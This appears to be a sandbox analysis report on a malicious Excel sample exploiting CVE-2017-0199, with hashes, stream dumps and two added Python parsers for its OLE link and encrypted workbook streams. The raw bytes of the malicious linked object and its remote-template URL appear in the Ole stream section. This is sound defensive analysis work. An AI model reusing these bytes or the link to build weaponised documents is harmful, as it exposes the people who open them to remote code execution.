                                                                              Malicious:false
                                                                              Preview:......................>.......................................................d.......f.......h.......j...........................................................................................................................................................................................................................................................................................................................................................................................................................4.......5............................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...e.......f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:false
                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 21:29:51 2024, Security: 1
                                                                              Category:dropped
                                                                              Size (bytes):552448
                                                                              Entropy (8bit):7.9897028436241655
                                                                              Encrypted:false
                                                                              SSDEEP:12288:rI4YmApPSP6hcAw2jnk/P/I8zqUfHbStSO3g7koy:yRSP6mAwAkX/I8WUDOBw7
                                                                              MD5:2BEAD29440CC9DBA59A90BB5B8FECEB9
                                                                              SHA1:47ABE6571D33AFF8E065458E5D64699D7A16C138
                                                                              SHA-256:8B508C4D0662C20AE32EB1870425B66F5CEC9AE5345BD17ACFAC16DD779DFEF8
                                                                              SHA-512:95F062B0267D532F4D603F4BA64CB783D298577A8F604A2DF8AE670198B67F1499726D76554608B7F389A68501F60C90AB936D3621FD71C83EA2380A994282E5
                                                                              Malicious:false
                                                                              Preview:......................>.......................................................d.......f.......h.......j...........................................................................................................................................................................................................................................................................................................................................................................................................................4.......5............................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...e.......f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):165
                                                                              Entropy (8bit):1.4377382811115937
                                                                              Encrypted:false
                                                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                              Malicious:true
                                                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 11:53:06 2024, Security: 1
                                                                              Entropy (8bit):7.969139072187488
                                                                              TrID:
                                                                              • Microsoft Excel sheet (30009/1) 47.99%
                                                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                              File name:SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx
                                                                              File size:548'864 bytes
                                                                              MD5:4d86c48b5d9f043b6e0b1ef3d2c7bdd4
                                                                              SHA1:9206cc3a88ac7f737bdac86649905a9978443109
                                                                              SHA256:33ac27d5d62b88cda7ee122abcd3209306e9527ab0b9dea5633572d8f3908bdd
                                                                              SHA512:ebcff9eba21e25dadc2df1f1e2c3f712ff48d96920ff81bc490e79e4cc59a3751667c213f153fc3145a84a9b8fbeb9093c63b0daa9506f532454ad0f5245feb1
                                                                              SSDEEP:12288:4AFGkrsew5HQeDRsdq4oNNxFUYM9eyfDZX4t2sbOeux3:REZFRQeHhN7FU7e4DitZ7o
                                                                              TLSH:81C423983AE1EF37F08368364ED2D0A78680FD160F92CA87B158379EC9FB7557611A05
                                                                              File Content Preview:........................>.......................................................e.......g.......i.......k......................................................................................................................................................
                                                                              Icon Hash:2562ab89a7b7bfbf
                                                                              Document Type:OLE
                                                                              Number of OLE Files:1
                                                                              Has Summary Info:
                                                                              Application Name:Microsoft Excel
                                                                              Encrypted Document:True
                                                                              Contains Word Document Stream:False
                                                                              Contains Workbook/Book Stream:True
                                                                              Contains PowerPoint Document Stream:False
                                                                              Contains Visio Document Stream:False
                                                                              Contains ObjectPool Stream:False
                                                                              Flash Objects Count:0
                                                                              Contains VBA Macros:True
                                                                              Code Page:1252
                                                                              Author:
                                                                              Last Saved By:
                                                                              Create Time:2006-09-16 00:00:00
                                                                              Last Saved Time:2024-08-28 10:53:06
                                                                              Creating Application:Microsoft Excel
                                                                              Security:1
                                                                              Document Code Page:1252
                                                                              Thumbnail Scaling Desired:False
                                                                              Contains Dirty Links:False
                                                                              Shared Document:False
                                                                              Changed Hyperlinks:False
                                                                              Application Version:786432
                                                                              General
                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                              VBA File Name:Sheet1.cls
                                                                              Stream Size:977
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O p . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 4f 70 c9 f0 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Attribute VB_Name = "Sheet1"
                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                              Attribute VB_GlobalNameSpace = False
                                                                              Attribute VB_Creatable = False
                                                                              Attribute VB_PredeclaredId = True
                                                                              Attribute VB_Exposed = True
                                                                              Attribute VB_TemplateDerived = False
                                                                              Attribute VB_Customizable = True
                                                                              

                                                                              General
                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                              VBA File Name:Sheet2.cls
                                                                              Stream Size:977
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O p M . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 4f 70 cf 4d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Attribute VB_Name = "Sheet2"
                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                              Attribute VB_GlobalNameSpace = False
                                                                              Attribute VB_Creatable = False
                                                                              Attribute VB_PredeclaredId = True
                                                                              Attribute VB_Exposed = True
                                                                              Attribute VB_TemplateDerived = False
                                                                              Attribute VB_Customizable = True
                                                                              

                                                                              General
                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                              VBA File Name:Sheet3.cls
                                                                              Stream Size:977
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O p . F . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 4f 70 1d 46 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Attribute VB_Name = "Sheet3"
                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                              Attribute VB_GlobalNameSpace = False
                                                                              Attribute VB_Creatable = False
                                                                              Attribute VB_PredeclaredId = True
                                                                              Attribute VB_Exposed = True
                                                                              Attribute VB_TemplateDerived = False
                                                                              Attribute VB_Customizable = True
                                                                              

                                                                              General
                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                              VBA File Name:ThisWorkbook.cls
                                                                              Stream Size:985
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O p U V . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 .
                                                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 4f 70 55 56 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Attribute VB_Name = "ThisWorkbook"
                                                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                              Attribute VB_GlobalNameSpace = False
                                                                              Attribute VB_Creatable = False
                                                                              Attribute VB_PredeclaredId = True
                                                                              Attribute VB_Exposed = True
                                                                              Attribute VB_TemplateDerived = False
                                                                              Attribute VB_Customizable = True
                                                                              

                                                                              General
                                                                              Stream Path:\x1CompObj
                                                                              CLSID:
                                                                              File Type:data
                                                                              Stream Size:114
                                                                              Entropy:4.25248375192737
                                                                              Base64 Encoded:True
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              General
                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                              CLSID:
                                                                              File Type:data
                                                                              Stream Size:244
                                                                              Entropy:2.889430592781307
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                              General
                                                                              Stream Path:\x5SummaryInformation
                                                                              CLSID:
                                                                              File Type:data
                                                                              Stream Size:200
                                                                              Entropy:3.2503503175049815
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . Z v 8 . . . . . . . . .
                                                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                              General
                                                                              Stream Path:MBD00533CD9/\x1Ole
                                                                              CLSID:
                                                                              File Type:data
                                                                              Stream Size:468
                                                                              Entropy:5.244530273180288
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . } . . & . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . z . h . o . r . t . . . d . e . / . U . l . E . Y . s . 1 . . . f ! i . 3 ~ l & . . . . P . @ j . ! . . x n . . . . ; 3 = 3 \\ 7 , . e 0 3 . Y . . - u j . . . . . . . . . . . . . . . . . . . I . O . C . t . A . 5 . 8 . I . t . T . D . t . F . y . H . D . f . H . 2 . O . 2 . 0 . s . j . l . 3 . R . S . 1 . d . F . y . U . R . p . F . m . 4 . F . 4 . y . 3 . 3 . v . y . E . j . f . A . 2 . G . 8 . 5 . q . D . J .
                                                                              Data Raw:01 00 00 02 f3 81 fe 7d 99 1b 16 26 00 00 00 00 00 00 00 00 00 00 00 00 94 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 90 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 7a 00 68 00 6f 00 72 00 74 00 2e 00 64 00 65 00 2f 00 55 00 6c 00 45 00 59 00 73 00 31 00 00 00 66 ad 21 ac e6 f6 b5 69 ef 0c 33 7e 88 85 6c 26 20 d2 ca 1e e6 8b 88 e8 f3 ae f6 0a 9b db b5 50
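The stream above is the OLE 1.0 "Ole" stream of a linked object: after the header it carries an absolute-source moniker whose CLSID is 79EAC9E0-BAF9-11CE-8C82-00AA004BA90B (the standard URL moniker) followed by the UTF-16LE string https://zhort.de/UlEYs1. That moniker is the remote-object fetch the report flags under "Office viewer loads remote template". The parser below is an added example, not Joe Sandbox code: SAMPLE_OLE_STREAM is the 128-byte Data Raw dump printed above (the stream itself is 468 bytes, so the dump is cut short); CONSTRUCTED_FILE_LINK, the UNC path in it, and the function names are mine, added so the same walker also handles the File-moniker variant of a linked object.

```python
# Decode the 'Ole' stream of a linked OLE object (MS-OLEDS OLEStream) and
# recover the moniker Office resolves when the object is activated.
# Added example, not Joe Sandbox code.  SAMPLE_OLE_STREAM is the 128-byte
# Data Raw dump the report prints for the Ole stream under MBD00533CD9;
# CONSTRUCTED_FILE_LINK is built here to exercise the File-moniker case and
# its UNC path is invented (documentation-only address).
import struct
import uuid

CLSID_URL_MONIKER = "79EAC9E0-BAF9-11CE-8C82-00AA004BA90B"   # CLSID_StdURLMoniker
CLSID_FILE_MONIKER = "00000303-0000-0000-C000-000000000046"  # CLSID_FileMoniker

SAMPLE_OLE_STREAM = bytes.fromhex(
    "01000002 f381fe7d 991b1626 00000000 00000000 00000000 94000000"
    "e0c9ea79 f9bace11 8c8200aa 004ba90b 90000000"
    "68007400 74007000 73003a00 2f002f00 7a006800 6f007200 74002e00"
    "64006500 2f005500 6c004500 59007300 31000000"
    "66ad21ac e6f6b569 ef0c337e 88856c26 20d2ca1e e68b88e8 f3aef60a 9bdbb550"
)


def make_linked_ole_stream(clsid: str, moniker_body: bytes) -> bytes:
    """Build a minimal linked-object OLEStream: header, two empty moniker
    slots, then the absolute-source moniker (CLSID followed by its body)."""
    # Version, Flags (bit 0 = linked), LinkUpdateOption, Reserved1
    header = struct.pack("<IIII", 0x02000001, 0x00000001, 0, 0)
    moniker = uuid.UUID(clsid).bytes_le + moniker_body
    return header + struct.pack("<III", 0, 0, len(moniker)) + moniker


# Constructed test input (not from the sample): FileMoniker fields cAnti,
# ansiLength, ansiPath, endServer, versionNumber.  The Unicode-path fields a
# real moniker carries after these are left out; the parser never reads them.
_ANSI_PATH = b"\\\\192.0.2.10\\davshare\\template.rtf"
CONSTRUCTED_FILE_LINK = make_linked_ole_stream(
    CLSID_FILE_MONIKER,
    struct.pack("<HI", 0, len(_ANSI_PATH) + 1) + _ANSI_PATH + b"\x00" + b"\xff\xff\xad\xde",
)


def _utf16_cstr(buf: bytes) -> str:
    """Decode a NUL-terminated UTF-16LE string; ignore whatever follows it."""
    for i in range(0, len(buf) - 1, 2):
        if buf[i] == 0 and buf[i + 1] == 0:
            return buf[:i].decode("utf-16-le", errors="replace")
    return buf[: len(buf) & ~1].decode("utf-16-le", errors="replace")


def decode_moniker(chunk: bytes) -> tuple:
    """Return (clsid, kind, target) for one serialised MONIKERSTREAM."""
    if len(chunk) < 16:
        return None, "none", None
    clsid = str(uuid.UUID(bytes_le=chunk[:16])).upper()
    body = chunk[16:]
    if clsid == CLSID_URL_MONIKER:
        # URLMoniker: Length (4 bytes), then a NUL-terminated UTF-16LE Url.
        # The terminator is authoritative; Length is not trusted because the
        # sample pads the stream with junk after the URL.
        return clsid, "url", _utf16_cstr(body[4:])
    if clsid == CLSID_FILE_MONIKER:
        # FileMoniker: cAnti (2 bytes), ansiLength (4), NUL-terminated ANSI path.
        (ansi_len,) = struct.unpack_from("<I", body, 2)
        path = body[6:6 + ansi_len].split(b"\x00", 1)[0]
        return clsid, "file", path.decode("latin-1")
    return clsid, "unknown", None


def parse_ole_stream(data: bytes) -> dict:
    """Walk the OLEStream header and its three moniker slots and decode the
    absolute-source moniker, which names the object Office will fetch."""
    if len(data) < 16:
        raise ValueError("too short for an OLEStream header")
    version, flags, _link_update, _reserved = struct.unpack_from("<IIII", data, 0)
    # Only bit 0 of Flags is meaningful (1 = linked); the sample fills the
    # remaining bits with junk, so test the bit rather than the whole word.
    out = {"version": version, "flags": flags, "linked": bool(flags & 1),
           "clsid": None, "kind": "embedded", "target": None, "truncated": False}
    if not out["linked"]:          # embedded objects carry no moniker fields
        return out
    pos, absolute = 16, b""
    for slot in ("reserved", "relative", "absolute"):
        if pos + 4 > len(data):
            out["truncated"] = True
            break
        (size,) = struct.unpack_from("<I", data, pos)
        pos += 4
        avail = len(data) - pos
        if size > avail:           # declared size runs past what we have
            out["truncated"] = True
        chunk = data[pos:pos + min(size, avail)]
        pos += len(chunk)
        if slot == "absolute":
            absolute = chunk
    out["clsid"], out["kind"], out["target"] = decode_moniker(absolute)
    return out


if __name__ == "__main__":
    for label, blob in (("report sample", SAMPLE_OLE_STREAM),
                        ("constructed file link", CONSTRUCTED_FILE_LINK)):
        r = parse_ole_stream(blob)
        print(f"{label}: linked={r['linked']} kind={r['kind']} "
              f"clsid={r['clsid']} target={r['target']!r} truncated={r['truncated']}")
```

On the report's bytes the walker reports a linked object whose absolute moniker is the URL moniker pointing at https://zhort.de/UlEYs1, and flags the dump as truncated because the declared moniker size (0x94) exceeds the 100 bytes that follow the size field in the 128-byte preview. The URL is cut at its NUL terminator deliberately: the Length field in this sample advertises 0x90 bytes, far more than the 48-byte URL, and the bytes after the terminator are high-entropy filler, so trusting Length would return garbage. Run the same function over the full 468-byte stream extracted with olefile or oledump to see whether anything meaningful follows.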
                                                                              General
                                                                              Stream Path:Workbook
                                                                              CLSID:
                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                              Stream Size:530907
                                                                              Entropy:7.999203348284179
                                                                              Base64 Encoded:True
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . x i . f . . O : . . / . 7 k . f . 8 } T . ` . . . . . . . . L ; . . . \\ . p . W g . . x ' . ~ T K S B x ] . P q ] g ( . T m < . . R , . \\ . Z . E < y k P . ] Z . . ! C + N e R U . . . . c n C . T k ) B . . . 8 a . . . . . . . = . . . O y . x . . . F ! . . _ G " / . . . r . . . . ? c . . . . . . . . 6 f . . . . . . . = . . . . W 1 . v K B B J 1 , z @ . . . " . . . " . . . . . . . . . . . . . . . . 1 . . . < A . ] . i Y < . x . D . c 1 . . . E . b ] . G .
                                                                              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 78 69 c3 1e 66 d1 86 e3 06 90 e7 4f 3a 98 1b 2e c3 2f 08 c2 db e7 a0 e1 37 d9 c4 6b 13 66 14 38 b0 b6 8b 7d e7 54 f5 d0 82 c0 60 e7 ab 11 8a be e1 00 02 00 b0 04 c1 00 02 00 4c 3b e2 00 00 00 5c 00 70 00 57 a0 ef a7 c7 67 c3 b9 c7 f7 14 aa 78 27 c1 9d 03 7e 9c 54 bc 4b 53 42 78 8a 8c 9d a6 5d
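The "Applesoft BASIC program data" label on this stream is a libmagic false match; the bytes open with a BIFF8 BOF record (id 0x0809, version 0x0600, substream type 5 = workbook globals) followed immediately by a FILEPASS record (id 0x002F), which is why the report says "Encrypted Document: True" and why the stream's entropy sits just under 8 bits. The record walker below is an added example, not Joe Sandbox code: WORKBOOK_HEAD is the 128-byte Data Raw dump printed above (the stream is 530907 bytes, so the last record in the dump is cut), and the RECORD_NAMES table and function names are mine.

```python
# Walk the BIFF8 records at the head of the Workbook stream and report how
# the workbook is protected.  Added example, not Joe Sandbox code.
# WORKBOOK_HEAD is the 128-byte Data Raw dump of the Workbook stream as
# printed in the report; the final record is truncated by that dump.
import struct

# Small subset of MS-XLS record ids, enough for the workbook-globals header.
RECORD_NAMES = {
    0x0809: "BOF", 0x000A: "EOF", 0x002F: "FILEPASS", 0x0042: "CODEPAGE",
    0x005C: "WRITEACCESS", 0x00C1: "MMS", 0x00E1: "INTERFACEHDR", 0x00E2: "INTERFACEEND",
}

WORKBOOK_HEAD = bytes.fromhex(
    "09081000 00060500 ab1fcd07 c1000100 06040000"
    "2f003600 01000100 0100"
    "7869c31e66d186e30690e74f3a981b2e c32f08c2dbe7a0e137d9c46b13661438"
    "b0b68b7de754f5d082c060e7ab118abe"
    "e1000200 b004 c1000200 4c3b e2000000 5c007000"
    "57a0efa7c767c3b9c7f714aa7827c19d037e9c54bc4b5342788a8c9da65d"
)


def walk_records(data: bytes) -> list:
    """Return BIFF records (2-byte id, 2-byte length, payload) until the data
    ends or an EOF record is met; a record whose declared length overruns the
    buffer is kept but flagged as truncated."""
    records, pos = [], 0
    while pos + 4 <= len(data):
        rec_id, length = struct.unpack_from("<HH", data, pos)
        payload = data[pos + 4:pos + 4 + length]
        records.append({"offset": pos, "id": rec_id,
                        "name": RECORD_NAMES.get(rec_id, f"0x{rec_id:04X}"),
                        "length": length, "payload": payload,
                        "truncated": len(payload) < length})
        pos += 4 + len(payload)
        if rec_id == 0x000A:   # EOF ends the substream
            break
    return records


def describe_filepass(payload: bytes) -> tuple:
    """Interpret a FILEPASS payload: returns (scheme, salt_hex)."""
    (enc_type,) = struct.unpack_from("<H", payload, 0)
    if enc_type == 0x0000:
        return "XOR obfuscation", None
    v_major, v_minor = struct.unpack_from("<HH", payload, 2)
    if (v_major, v_minor) == (1, 1):
        # RC4 standard header: Salt(16) EncryptedVerifier(16) EncryptedVerifierHash(16)
        return "RC4 (standard, v1.1)", payload[6:22].hex()
    if v_major in (2, 3, 4) and v_minor == 2:
        return "RC4 CryptoAPI", None
    return f"unknown (type {enc_type}, v{v_major}.{v_minor})", None


def analyze_workbook(data: bytes) -> dict:
    """Summarise the BOF header and any FILEPASS record in the stream head."""
    records = walk_records(data)
    info = {"biff_version": None, "substream_type": None,
            "encryption": None, "salt": None, "records": records}
    if records and records[0]["id"] == 0x0809 and len(records[0]["payload"]) >= 4:
        info["biff_version"], info["substream_type"] = struct.unpack_from(
            "<HH", records[0]["payload"], 0)
    for rec in records:
        if rec["id"] == 0x002F and not rec["truncated"]:
            info["encryption"], info["salt"] = describe_filepass(rec["payload"])
    return info


if __name__ == "__main__":
    info = analyze_workbook(WORKBOOK_HEAD)
    print(f"BIFF 0x{info['biff_version']:04X}, substream {info['substream_type']}, "
          f"encryption: {info['encryption']}, salt: {info['salt']}")
    for rec in info["records"]:
        flag = " (truncated)" if rec["truncated"] else ""
        print(f"  +{rec['offset']:3d} {rec['name']:<13} len={rec['length']:3d} "
              f"{rec['payload'][:8].hex()}{flag}")
```

On the dump this yields BOF, FILEPASS (RC4 standard encryption, vMajor 1 / vMinor 1, salt 7869c31e66d186e30690e74f3a981b2e), INTERFACEHDR, MMS, INTERFACEEND and a truncated WRITEACCESS. The payloads show where encryption starts: INTERFACEHDR still reads as clear text (code page 0x04B0 = 1200), while MMS, whose two reserved bytes are normally zero, already reads 4c 3b, and everything from WRITEACCESS on looks random. Because the sandbox opened the workbook without a password, the default password Excel applies silently is worth trying first when you need the plaintext BIFF stream; msoffcrypto-tool accepts it with `-p VelvetSweatshop`.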
                                                                              General
                                                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                              CLSID:
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Stream Size:525
                                                                              Entropy:5.244999892995313
                                                                              Base64 Encoded:True
                                                                              Data ASCII:I D = " { E A 4 B 8 9 5 C - 9 D 4 D - 4 9 F C - 9 D B 9 - 2 7 0 9 F A D B 5 2 E 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 3 3 1 1 C C 6 C 6 C A C 6 C A C
